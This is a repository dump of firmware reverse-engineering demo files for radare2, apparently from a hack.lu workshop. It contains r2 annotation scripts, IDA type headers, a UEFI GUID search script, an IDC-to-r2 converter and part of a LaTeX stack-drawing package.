-bios omap_3430.bin -mtdblock mbmloader-1.raw -d in_asm,cpu,exec -nographic 3 | -------------------------------------------------------------------------------- /demos/Firmware/demo1_arm_boot/run_r2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | r2 -a arm.gnu -b 32 -e io.va=true omap_3430.bin 3 | -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_legacy/asrock_p4i65g.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_legacy/asrock_p4i65g.bin -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_legacy/asrock_p4i65g.h: -------------------------------------------------------------------------------- 1 | /* 2 | This file has been generated by IDA. 3 | It contains local type definitions from 4 | /home/xvilka/RE/hw/asrockp4i65gv/asrockp4i65g.idb 5 | */ 6 | 7 | /* 1 */ 8 | enum CPU_MSRS 9 | { 10 | IA32_TIME_STAMP_COUNTER = 0x10, 11 | IA32_PLATFORM_ID = 0x17, 12 | MSR_EBC_FREQUENCY_ID = 0x2C, 13 | IA32_BIOS_UPDT_TRIG = 0x79, 14 | IA32_BIOS_SIGN_ID = 0x8B, 15 | IA32_PERF_STATUS = 0x198, 16 | IA32_PERF_CTL = 0x199, 17 | IA32_MISC_ENABLE = 0x1A0, 18 | MSR_PLATFORM_BRV = 0x1A1, 19 | IA32_MTRR_PHYSBASE0 = 0x200, 20 | IA32_MTRR_PHYSMASK0 = 0x201, 21 | IA32_MTRR_PHYSMASK7 = 0x20F, 22 | IA32_MTRR_FIX64K_00000 = 0x250, 23 | IA32_MTRR_FIX16K_80000 = 0x258, 24 | IA32_MTRR_FIX16K_A0000 = 0x259, 25 | IA32_MTRR_FIX4K_C0000 = 0x268, 26 | IA32_MTRR_FIX4K_C8000 = 0x269, 27 | IA32_MTRR_FIX4K_D0000 = 0x26A, 28 | IA32_MTRR_FIX4K_D8000 = 0x26B, 29 | IA32_MTRR_FIX4K_E0000 = 0x26C, 30 | IA32_MTRR_FIX4K_E8000 = 0x26D, 31 | IA32_MTRR_FIX4K_F0000 = 0x26E, 32 | IA32_MTRR_FIX4K_F8000 = 0x26F, 33 | IA32_MTRR_DEF_TYPE = 0x2FF, 34 | }; 35 | 36 | /* 2 */ 37 | enum SMBus 38 | { 39 | SMBUS_HST_STS 
= 0x400, 40 | SMBUS_HST_CNT = 0x402, 41 | SMBUS_HST_CMD = 0x403, 42 | SMBUS_XMIT_SLVA = 0x404, 43 | SMBUS_HST_D0 = 0x405, 44 | SMBUS_HST_D1 = 0x406, 45 | }; 46 | 47 | /* 3 */ 48 | struct PCI_reg_mask 49 | { 50 | char reg_address; 51 | char disable_mask; 52 | char enable_mask; 53 | }; 54 | 55 | /* 5 */ 56 | struct SMBus_reg 57 | { 58 | char field_0; 59 | char field_1; 60 | }; 61 | 62 | /* 6 */ 63 | struct PCI_reg_masks 64 | { 65 | char pci_reg; 66 | short mask; 67 | }; 68 | 69 | /* 7 */ 70 | enum GPIO_registers 71 | { 72 | GPIO_USE_SEL = 0x480, 73 | GP_IO_SEL = 0x484, 74 | GP_LVL = 0x48C, 75 | GPO_TTL = 0x494, 76 | GPO_BLINK = 0x498, 77 | GPI_INV = 0x4AC, 78 | GPIO_USE_SEL2 = 0x4B0, 79 | GP_IO_SEL2 = 0x4B4, 80 | GP_LVL2 = 0x4B8, 81 | }; 82 | 83 | /* 8 */ 84 | struct SIO_reg_mask 85 | { 86 | char reg_address; 87 | char disable_mask; 88 | char enable_mask; 89 | }; 90 | 91 | /* 9 */ 92 | 93 | 94 | /* End of file */ 95 | -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_legacy/asrock_p4i65g.r2: -------------------------------------------------------------------------------- 1 | af+ 0xf000:0x5786 8 SMBus_ICH5_Reg_Write_Byte_SL 2 | af+ 0xf000:0x578e 8 SMBus_ICH5_Reg_Read_Byte_SL 3 | "CCa 0xf000:0x5786 void SMBus_ICH5_Reg_Write_Byte_SL(uint8_t reg, uint8_t value);" 4 | "CCa 0xf000:0x578e void SMBus_ICH5_Reg_Read_Byte_SL(uint8_t reg);" 5 | 6 | "CCa 0xf000:0x574d value = 0xD3; reg = 0x4; // XMIT_SLVA - Transmit Slave Address" 7 | "CCa 0xf000:0x575b reg = 0x3; // HST_CMD - Host Command" 8 | "CCa 0xf000:0x5762 value = 0x48; reg = 0x2; // HST_CNT - Host Control, value [6] - Start transmission, [3] - Byte Data mode" 9 | af+ 0xf000:0x574d 57 SMBus_Read_Byte_SL 10 | f. SMB_Write_CMD @ 0xf000:0x5755 11 | f. SMB_Start_CMD @ 0xf000:0x5762 12 | f. SMB_Read_Data @ 0xf000:0x5779 13 | f. 
SMB_Wait @ 0xf000:0x576d 14 | 15 | "CCa 0xf000:0x56e0 value = 0xD2; reg = 0x4; // XMIT_SLVA - Transmit Slave Address" 16 | "CCa 0xf000:0x56ed value" 17 | "CCa 0xf000:0x56ef reg = 0x3; // HST_CMD - Host Command" 18 | "CCa 0xf000:0x56f7 value" 19 | "CCa 0xf000:0x56fb reg = 0x5; // HST_D0 - Host Data 0" 20 | "CCa 0xf000:0x5703 value = 0x48; reg = 0x2; // HST_CNT - Host Control, value [6] - Start transmission, [3] - Byte Data mode" 21 | af+ 0xf000:0x56e0 64 SMBus_Write_Byte_SL 22 | f. SMB_Write_CMD @ 0xf000:0x56e9 23 | f. SMB_Write_Data @ 0xf000:0x56f7 24 | f. SMB_Start_CMD @ 0xf000:0x5703 25 | f. SMB_Wait @ 0xf000:0x570e 26 | 27 | af+ 0xf000:0x5720 45 SMBus_Read_Block_SL 28 | af+ 0xf000:0x56b1 47 SMBus_Write_Block_SL 29 | 30 | af+ 0xf000:0x47a3 7 SMBus_ICH5_Reg_Write_Byte 31 | af+ 0xf000:0x479c 7 SMBus_ICH5_Reg_Read_Byte 32 | "CCa 0xf000:0x47a3 void SMBus_ICH5_Reg_Write_Byte(uint8_t reg, uint8_t value);" 33 | "CCa 0xf000:0x479c void SMBus_ICH5_Reg_Read_Byte(uint8_t reg);" 34 | 35 | "CCa 0xf000:0x47ad HST_STS - Host Status" 36 | "CCa 0xf000:0x47b6 [3] - BUS_ERR; [2] - DEV_ERR; [1] - INTR (command termination); [0] - HOST_BUSY;" 37 | af+ 0xf000:47aa 24 SMBus_Host_Transaction_Complete_Errors_Check 38 | f. wait @ 0xf000:0x47ad 39 | f. return_clear_carry @ 0xf000:0x47c0 40 | 41 | "CCa 0xf000:0x47c5 HST_STS - Host Status" 42 | "CCa 0xf000:0x47cb [1] - INTR (1 - successfull completion)" 43 | af+ 0xf000:0x47c2 19 SMBus_Host_Transaction_Complete_Check 44 | f. wait @ 0xf000:0x47c5 45 | f. 
return_clear_carry @ 0xf000:0x47d3 46 | 47 | Cd 2 @ 0xf000:0x46e0 48 | Cd 2 @ 0xf000:0x46f2 49 | Cd 2 @ 0xf000:0x4700 50 | Cd 2 @ 0xf000:0x470c 51 | Cd 2 @ 0xf000:0x4714 52 | Cd 2 @ 0xf000:0x4722 53 | Cd 2 @ 0xf000:0x472b 54 | "CCa 0xf000:0x46e8 reg = 0x4; // XMIT_SLVA - Transmit Slave Address" 55 | "CCa 0xf000:0x46f8 reg = 0x3; // HST_CMD - Host Command" 56 | "CCa 0xf000:0x4702 value = 0x48; reg = 0x2; // HST_CNT - Host Control, value [6] - Start transmission, [3] - Byte Data mode" 57 | "CCa 0xf000:0x4716 SMBus timeout or error" 58 | "CCa 0xf000:0x4724 reg = 0x5; // HST_D0 - Host Data 0" 59 | af+ 0xf000:0x46d2 100 SMBus_Read_Byte 60 | f. SMB_Write_Address @ 0xf000:0x46e0 61 | f. SMB_Write_CMD @ 0xf000:0x46f4 62 | f. SMB_Start_CMD @ 0xf000:0x4702 63 | f. SMB_Wati_Transaction_Completion @ 0xf000:0x470e 64 | f. SMB_Host_Reset @ 0xf000:0x4716 65 | f. SMB_Read_DATA0 @ 0xf000:0x4724 66 | f. return_clear_carry @ 0xf000:0x472d 67 | f. return @ 0xf000:0x4732 68 | 69 | af+ 0xf000:0x4736 102 SMBus_Write_Byte 70 | 71 | af+ 0xf000:0x5c93 51 SIO_Init 72 | f. read_loop @ 0xf000:0x5c9b 73 | f. next_item @ 0xf000:0x5ca3 74 | f. write_loop @ 0xf000:0x5caa 75 | f. 
return @ 0xf000:0x5cbf 76 | 77 | s 0xf000:0x5c93 78 | -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/Asus_937_12sec_dmienbg64.efi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/Asus_937_12sec_dmienbg64.efi -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/CpuPei.efi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/CpuPei.efi -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/NTFS.efi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/NTFS.efi -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/PchInit.pe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/PchInit.pe -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/PchMeUma.efi: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/PchMeUma.efi -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/S3Restore.efi: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/S3Restore.efi -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/SomeUefiFile.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/SomeUefiFile.bin -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/example.te: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/example.te -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/hp_image.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/hp_image.bin -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/hp_image_2.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo3_x86_uefi/hp_image_2.bin -------------------------------------------------------------------------------- /demos/Firmware/demo3_x86_uefi/search_guids.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | import r2pipe 3 | 4 | # GUIDs dictionaries 5 | import efiguids 6 | 7 | r2 = r2pipe.open(None) 8 | 9 | for name, guid in efiguids.GUIDs.iteritems(): 10 | b3b2b1b0, b5b4, b7b6, b8,b9,b10,b11,b12,b13,b14,b15 = guid 11 | 12 | b0 = b3b2b1b0 & 0xff 13 | b1 = 
(b3b2b1b0 & 0xff00) >> 8 14 | b2 = (b3b2b1b0 & 0xff0000) >> 16 15 | b3 = (b3b2b1b0 & 0xff000000) >> 24 16 | 17 | b4 = b5b4 & 0xff 18 | b5 = (b5b4 & 0xff00) >> 8 19 | 20 | b6 = b7b6 & 0xff 21 | b7 = (b7b6 & 0xff00) >> 8 22 | 23 | guid_part1 = "{0:x}{1:x}{2:x}{3:x}{4:x}{5:x}{6:x}{7:x}".format(b0,b1,b2,b3,b4,b5,b6,b7) 24 | guid_part2 = "{0:x}{1:x}{2:x}{3:x}{4:x}{5:x}{6:x}{7:x}".format(b8,b9,b10,b11,b12,b13,b14,b15) 25 | 26 | guid_search = "/xj " + guid_part1 + guid_part2 27 | 28 | for i in r2.cmdj(guid_search): 29 | print(type(i)) 30 | if isinstance(i,dict): 31 | print("Found {0} at 0x{1:x} offset\n".format(name, i[u'offset'])) 32 | # Removing the 'hit_*' flags, unneeded now 33 | r2_line = "f- @ 0x{0:x}".format(i[u'offset']) 34 | r2.cmd(r2_line) 35 | # Adding the flag with the GUID name 36 | r2_line = "f " + name + " 16 @ " + "0x{0:x}\n".format(i[u'offset']) 37 | r2.cmd(r2_line) 38 | # Markinf the GUID as a data 39 | r2_line = "Cd 16 @ " + "0x{0:x}\n".format(i[u'offset']) 40 | r2.cmd(r2_line) 41 | 42 | 43 | -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ITE_IT8502E_F_G_V0_7_7_09042008_1COM.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ITE_IT8502E_F_G_V0_7_7_09042008_1COM.pdf -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/idc2r.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | # radare - LGPL - Copyright 2013 - xvilka 4 | 5 | import re 6 | import sys 7 | 8 | class Func(object): 9 | # FIXME: parse ftype into params and values 10 | def __init__(self, name="unknown", params=[], values=[], address=0, size=0, ftype=""): 11 | self.name = name 12 | self.params = params 13 | self.values = values 14 | self.address = address 15 | 
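class Func(object):
    """A function recovered from IDC MakeFunction/MakeName/SetType calls."""
    # FIXME: parse ftype into params and values
    def __init__(self, name="unknown", params=None, values=None, address=0, size=0, ftype=""):
        self.name = name
        # A fresh list per instance: a shared [] default would be mutated across all Funcs.
        self.params = [] if params is None else params
        self.values = [] if values is None else values
        self.address = address
        self.size = size
        self.ftype = ftype


class Llabel(object):
    """A local label inside a function (IDC MakeNameEx with SN_LOCAL)."""
    def __init__(self, name="unknown", address=0):
        self.name = name
        self.address = address


class Comm(object):
    """One line of an address comment (IDC MakeComm)."""
    def __init__(self, text="", address=0):
        self.text = text
        self.address = address


class Enum(object):
    """An enum and its members (parsing is not implemented yet, see enums_parse)."""
    def __init__(self, name="unknown", members=None):
        self.name = name
        self.members = [] if members is None else members


class Struct(object):
    """A structure declared with IDC AddStrucEx."""
    def __init__(self, name="unknown", members=None):
        self.name = name
        self.members = [] if members is None else members


class Union(object):
    """A union; same shape as Struct."""
    def __init__(self, name="unknown", members=None):
        self.name = name
        self.members = [] if members is None else members


class Type(object):
    """A named type with optional members."""
    # `members` used to be read as an undefined global (NameError on every Type());
    # it is an optional parameter now.
    def __init__(self, name="unknown", members=None):
        self.name = name
        self.members = [] if members is None else members

# -----------------------------------------------------------------------

# Parsed items, filled in by the *_parse functions below and emitted by generate_r2.
functions = []
llabels = []
comments = []
structs = []
enums = []
types = []

# A hex literal as written by IDA's IDC export (0x / 0X prefix, up to 8 digits).
_HEX_LITERAL = r"0[xX][\dA-Fa-f]{1,8}"


def _hex_arg(group):
    """Pattern for a hex literal argument, captured as named group *group*."""
    return r"(?P<{0}>{1})".format(group, _HEX_LITERAL)


def _quoted_arg(group):
    """Pattern for a double-quoted string argument, captured as *group* (quotes excluded)."""
    return r'"(?P<{0}>.*)"'.format(group)


def _idc_call_re(name, args, lhs=None):
    """Compile a MULTILINE regex matching one `name(arg, arg, ...);` IDC statement on its own line.

    *args* are the argument patterns in order; *lhs* adds a leading `lhs =` assignment
    (e.g. `id = AddStrucEx(...)`). Whitespace around the call and the commas is tolerated.
    Raw strings are used throughout so `\(` and `\d` are not treated as string escapes.
    """
    head = r"^[ \t]*"
    if lhs is not None:
        head += lhs + r"[ \t]*=[ \t]*"
    arglist = r"[ \t]*,[ \t]*".join(args)
    return re.compile(head + name + r"[ \t]*\([ \t]*" + arglist + r"[ \t]*\);[ \t]*$", re.MULTILINE)


def _funcs_at(address):
    """Every parsed Func starting at *address* (an IDC file may name the same start more than once)."""
    return [f for f in functions if f.address == address]


def functions_parse(idc):
    """Collect functions and local labels from the IDC text *idc* into the module lists.

    Recognised statements, one per line: MakeFunction(start, end) creates a Func;
    SetFunctionFlags(start, flags) is recognised but not interpreted yet;
    MakeName(start, "name") and SetType(start, "proto") annotate an already parsed Func;
    MakeNameEx(addr, "name", SN_LOCAL) adds an Llabel.
    """
    # MakeFunction (0XF3C99,0XF3CA8);
    mkfun_re = _idc_call_re("MakeFunction", [_hex_arg("fstart"), _hex_arg("fend")])
    for match in mkfun_re.finditer(idc):
        fun = Func()
        fun.address = int(match.group("fstart"), 16)
        fun.size = int(match.group("fend"), 16) - fun.address
        functions.append(fun)

    # SetFunctionFlags (0XF3C99, 0x400);
    mkfunflags_re = _idc_call_re("SetFunctionFlags", [_hex_arg("fstart"), _hex_arg("flags")])
    for match in mkfunflags_re.finditer(idc):
        pass  # TODO: parse flags into the Func(s) at match.group("fstart")

    # MakeFrame (0XF3C99, 0, 0, 0);
    # MakeName (0XF3C99, "SIO_port_setup_S");
    mkname_re = _idc_call_re("MakeName", [_hex_arg("fstart"), _quoted_arg("fname")])
    for match in mkname_re.finditer(idc):
        fname = match.group("fname")
        if fname:  # an empty "" name leaves the Func as "unknown"
            for fun in _funcs_at(int(match.group("fstart"), 16)):
                fun.name = fname

    # SetType (0XFFF72, "__int32 __cdecl PCI_ByteWrite_SL(__int32 address, __int32 value)");
    mkftype_re = _idc_call_re("SetType", [_hex_arg("fstart"), _quoted_arg("ftype")])
    for match in mkftype_re.finditer(idc):
        ftype = match.group("ftype")
        if ftype:
            for fun in _funcs_at(int(match.group("fstart"), 16)):
                fun.ftype = ftype

    # MakeNameEx (0xF3CA0, "return", SN_LOCAL);
    mklocal_re = _idc_call_re("MakeNameEx", [_hex_arg("laddr"), _quoted_arg("lname"), "SN_LOCAL"])
    for match in mklocal_re.finditer(idc):
        lab = Llabel()
        lab.address = int(match.group("laddr"), 16)
        lname = match.group("lname")
        if lname:
            lab.name = lname
        llabels.append(lab)

# ----------------------------------------------------------------------

def enums_parse(idc):
    """Enum parsing is not implemented; *idc* is ignored and `enums` stays empty."""
    pass

# ----------------------------------------------------------------------

def structs_parse(idc):
    """Collect structures declared with `id = AddStrucEx(-1, "name", 0);` into `structs`.

    Member parsing (AddStructMember) is not implemented yet; the cases below sketch it.
    """
    # id = AddStrucEx (-1, "struct_MTRR", 0);
    mkstruct_re = _idc_call_re("AddStrucEx", ["-1", _quoted_arg("sname"), "0"], lhs="id")
    for match in mkstruct_re.finditer(idc):
        s = Struct()
        sname = match.group("sname")
        if sname:
            s.name = sname
        structs.append(s)

    # Case 1: not nested structures
    # =============================
    # id = GetStrucIdByName ("struct_header");
    # mid = AddStructMember(id,"BCPNV", 0, 0x5000c500, 0, 7);
    # mid =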
AddStructMember(id,"_", 0X7, 0x00500, -1, 1); 200 | # mid = AddStructMember(id, "BCPNV_size",0X8, 0x004500, -1, 1); 201 | mkstruct_re = re.compile(""" 202 | (?m) # Multiline 203 | ^[ \t]*id[ \t]*=[ \t]*GetStrucIdByName[ \t]*\( 204 | [ \t]*-1[ \t]*,[ \t]* 205 | "(?P.*)" # Structure name 206 | [ \t]*\,[ \t]*0 207 | [ \t]*\);[ \t]*$ 208 | """, re.VERBOSE) 209 | 210 | # ---------------------------------------------------------------------- 211 | 212 | def comments_parse(idc): 213 | # MakeComm (0XFED3D, "PCI class 0x600 - Host/PCI bridge"); 214 | mkcomm_re = re.compile(""" 215 | (?m) # Multiline 216 | ^[ \t]*MakeComm[ \t]*\( 217 | (?P0[xX][\dA-Fa-f]{1,8}) # Comment address 218 | [ \t]*\,[ \t]* 219 | "(?P.*)" # Comment 220 | [ \t]*\);[ \t]*$ 221 | """, re.VERBOSE) 222 | mkcomm_group_name = dict([(v,k) for k,v in mkcomm_re.groupindex.items()]) 223 | mkcomm = mkcomm_re.finditer(idc) 224 | for match in mkcomm : 225 | for group_index,group in enumerate(match.groups()) : 226 | if group : 227 | if mkcomm_group_name[group_index+1] == "caddr" : 228 | address = int(group, 16) 229 | if mkcomm_group_name[group_index+1] == "ctext" : 230 | com_multi = group.split('\\n') 231 | for a in com_multi : 232 | com = Comm() 233 | com.address = address 234 | com.text = a 235 | comments.append(com) 236 | 237 | # ---------------------------------------------------------------------- 238 | 239 | # print("af+ 0x%08lx %d %s" % (func.address, func.size, func.name)) 240 | 241 | def generate_r2(): 242 | for f in functions : 243 | if f.name != "unknown" : 244 | print("af+ {0} {1} {2}".format(hex(f.address), f.size, f.name)) 245 | print("\"CCa {0} {1}\"".format(hex(f.address), f.ftype)) 246 | 247 | for l in llabels : 248 | if l.name != "unknown" : 249 | for f in functions : 250 | if (l.address > f.address) and (l.address < (f.address + f.size)) : 251 | print("f. 
{0} @ {1}".format(l.name, hex(l.address))) 252 | 253 | for c in comments : 254 | if c.text != "" : 255 | print("\"CCa {0} {1}\"".format(c.address, c.text)) 256 | 257 | # ---------------------------------------------------------------------- 258 | 259 | def idc_parse(idc): 260 | enums_parse(idc) 261 | structs_parse(idc) 262 | functions_parse(idc) 263 | comments_parse(idc) 264 | generate_r2() 265 | 266 | if __name__ == "__main__": 267 | if len(sys.argv) < 2: 268 | print("Usage: idc2r.py input.idc > output.r2") 269 | sys.exit(1) 270 | 271 | #print(sys.argv[1]) 272 | idc_file = open(sys.argv[1], "r") 273 | idc = idc_file.read() 274 | idc_parse(idc) 275 | -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502.asm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ite_it8502.asm -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502.lst: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ite_it8502.lst -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502.r2: -------------------------------------------------------------------------------- 1 | CCa 0x9954 SMBUS_4P7USL 2 | af+ 0x9954 36 set_SMBus_frequency 3 | "CCa 0x995a 4.0s High Register (4P0USH)" 4 | "CCa 0x995e 300ns Register (300NS)" 5 | "CCa 0x9962 260ns Register (250NS)" 6 | "CCa 0x9966 25ms Register (25MS)" 7 | "CCa 0x996a 45.3s Low Register (45P3USL)" 8 | "CCa 0x996e 45.3s High Register (45P3USH)" 9 | "CCa 0x9972 4.7s and 4.0s High Register (4P7A4P0H)" 10 | 11 | s 0x9954 12 | 
-------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502.rom: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ite_it8502.rom -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502_from_ida.r2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ite_it8502_from_ida.r2 -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502e.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ite_it8502e.idb -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/ite_it8502e.idc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/demos/Firmware/demo5_it8502e/ite_it8502e.idc -------------------------------------------------------------------------------- /demos/Firmware/demo5_it8502e/run_r2.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | r2 -a 8051 ite_it8502.rom 3 | -------------------------------------------------------------------------------- /demos/others/pfvdemo: -------------------------------------------------------------------------------- 1 | pr `pfv.pe_nt_image_headers32.optionalHeader.dataDirectory[4].size @ pe_nt_image_headers32` @ `pfv.pe_nt_image_headers32.optionalHeader.dataDirectory[4].virtualAddress @ 
pe_nt_image_headers32`+8 > pe_certificate ; !openssl pkcs7 -inform DER -print_certs -text -in pe_certificate -------------------------------------------------------------------------------- /drawstack.sty: -------------------------------------------------------------------------------- 1 | %% drawstack.sty 2 | % 3 | % v0 (2010) : draw stack. 4 | % v0.1 (2012) : draw structures outside stack. 5 | % 6 | %% Copyright 2010,2012 Matthieu Moy 7 | % 8 | % This work may be distributed and/or modified under the 9 | % conditions of the LaTeX Project Public License, either version 1.3 10 | % of this license or (at your option) any later version. 11 | % The latest version of this license is in 12 | % http://www.latex-project.org/lppl.txt 13 | % and version 1.3 or later is part of all distributions of LaTeX 14 | % version 2005/12/01 or later. 15 | % 16 | % This work has the LPPL maintenance status `maintained'. 17 | % 18 | % The Current Maintainer of this work is M. Matthieu Moy. 19 | % 20 | % This work consists of the files drawstack.sty and the example file 21 | % stack-example.tex. 22 | 23 | \NeedsTeXFormat{LaTeX2e} 24 | 25 | \ProvidesPackage{drawstack}[2010/08/06 Draw Execution Stack in LaTeX] 26 | 27 | \RequirePackage{tikz} 28 | \RequirePackage{ifthen} 29 | 30 | % Default styles definition. 
31 | \tikzstyle{freecell}=[fill=green!10,draw=green!30!black] 32 | \tikzstyle{freestruct}=[fill=blue!10,draw=blue!30!black] 33 | \tikzstyle{occupiedcell}=[fill=green!10!red!10,draw=green!30!black] 34 | \tikzstyle{padding}=[fill=green!10!black!10,draw=green!30!black] 35 | \tikzstyle{highlight}=[draw=red!50!black,text=red!50!black] 36 | 37 | \DeclareOption{nocolor}{ 38 | \tikzstyle{freecell}=[fill=white!95!black,draw=black] 39 | \tikzstyle{freestruct}=[fill=white!93!black,draw=black] 40 | \tikzstyle{occupiedcell}=[fill=white!60!black,draw=black] 41 | \tikzstyle{padding}=[fill=white!90!black!10,draw=black] 42 | \tikzstyle{highlight}=[draw=black,text=black] 43 | } 44 | \ProcessOptions 45 | 46 | \pgfdeclarelayer{background layer} 47 | \pgfdeclarelayer{foreground layer} 48 | \pgfsetlayers{background layer,main,foreground layer} 49 | \usetikzlibrary{shapes} % ellipse 50 | \usetikzlibrary{snakes} % braces 51 | 52 | \newcounter{cellnb} 53 | \newcounter{structnb} 54 | \setcounter{cellnb}{0} 55 | 56 | \newcommand{\llcell}[3]{ 57 | \addtocounter{cellnb}{-#1} 58 | \setcounter{ptrnb}{0} 59 | \draw[#2] (0,\value{cellnb}) +(-2,-.5) rectangle +(2,-.5+#1); 60 | \draw (0,\value{cellnb}+#1/2-0.5) node(currentcell) {#3}; 61 | } 62 | \newcommand{\bigcell}[2]{ 63 | \llcell{#1}{freecell}{#2} 64 | \foreach \c in {2,...,#1} { 65 | \draw[freecell] 66 | (-2,\value{cellnb}+\c-1.5) -- (-1.7,\value{cellnb}+\c-1.5); 67 | \draw[freecell] 68 | (1.7,\value{cellnb}+\c-1.5) -- (2,\value{cellnb}+\c-1.5); 69 | } 70 | } 71 | \newcommand{\cell}[2][freecell]{% 72 | \llcell{1}{#1}{#2}} 73 | 74 | \newcommand{\separator}[1][freecell,very thick]{ 75 | \draw[#1] (0,\value{cellnb}) +(-2,-.5) -- +(2,-.5); 76 | } 77 | 78 | % Pointer to the next cell, useful if the next cell has size != 0. 
79 | \newcommand{\cellptrnext}[1]{ 80 | \draw[<-,line width=0.7pt] (0,\value{cellnb}-1) +(2,\value{ptrnb}*0.1) -- +(2.5,\value{ptrnb}*0.45); 81 | \draw (2.5,\value{ptrnb}*0.5+\value{cellnb}-1) node[anchor=west] {#1}; 82 | \addtocounter{ptrnb}{1} 83 | } 84 | \newcounter{ptrnb} 85 | \newcommand{\cellptr}[1]{ 86 | \draw[<-,line width=0.7pt] (0,\value{cellnb}) +(2,\value{ptrnb}*0.1) -- +(2.5,\value{ptrnb}*0.45); 87 | \draw (2.5,\value{ptrnb}*0.5+\value{cellnb}) node[anchor=west] {#1}; 88 | \addtocounter{ptrnb}{1} 89 | } 90 | \newcommand{\esp}{\cellptr{\%esp}} 91 | \newcommand{\ebp}{\cellptr{\%ebp}} 92 | 93 | % like cellptr, but without the arrow 94 | \newcommand{\cellcom}[1]{ 95 | \draw (2.4,\value{ptrnb}*0.5+\value{cellnb}) node[anchor=west] {#1}; 96 | \addtocounter{ptrnb}{1} 97 | } 98 | % like cellcom, but on the left hand side 99 | \newcommand{\cellcomL}[1]{ 100 | \draw (-2,\value{ptrnb}*0.5+\value{cellnb}) node[anchor=east] {#1}; 101 | \addtocounter{ptrnb}{1} 102 | } 103 | 104 | \newcommand{\cellround}[1]{ 105 | \begin{pgfonlayer}{foreground layer} 106 | \draw[highlight] (0,\value{cellnb}) 107 | node[shape=ellipse,draw, minimum width=3cm, minimum height=0.9cm] 108 | (marked) {}; 109 | \draw[highlight] (0,\value{cellnb}) +(3,1.3) node[anchor=west] (textmarked) {#1}; 110 | \draw[highlight,->] (marked) -- (textmarked.text); 111 | \end{pgfonlayer} 112 | } 113 | 114 | \newcommand{\stacktop}[2][freecell]{ 115 | \setcounter{cellnb}{0} 116 | \ifthenelse{\equal{#2}{}}{}{ 117 | \draw (0,\value{cellnb}) node {#2}; 118 | \addtocounter{cellnb}{-1} 119 | } 120 | 121 | \draw[#1] (0,\value{cellnb}) 122 | +(-2,.5) -- 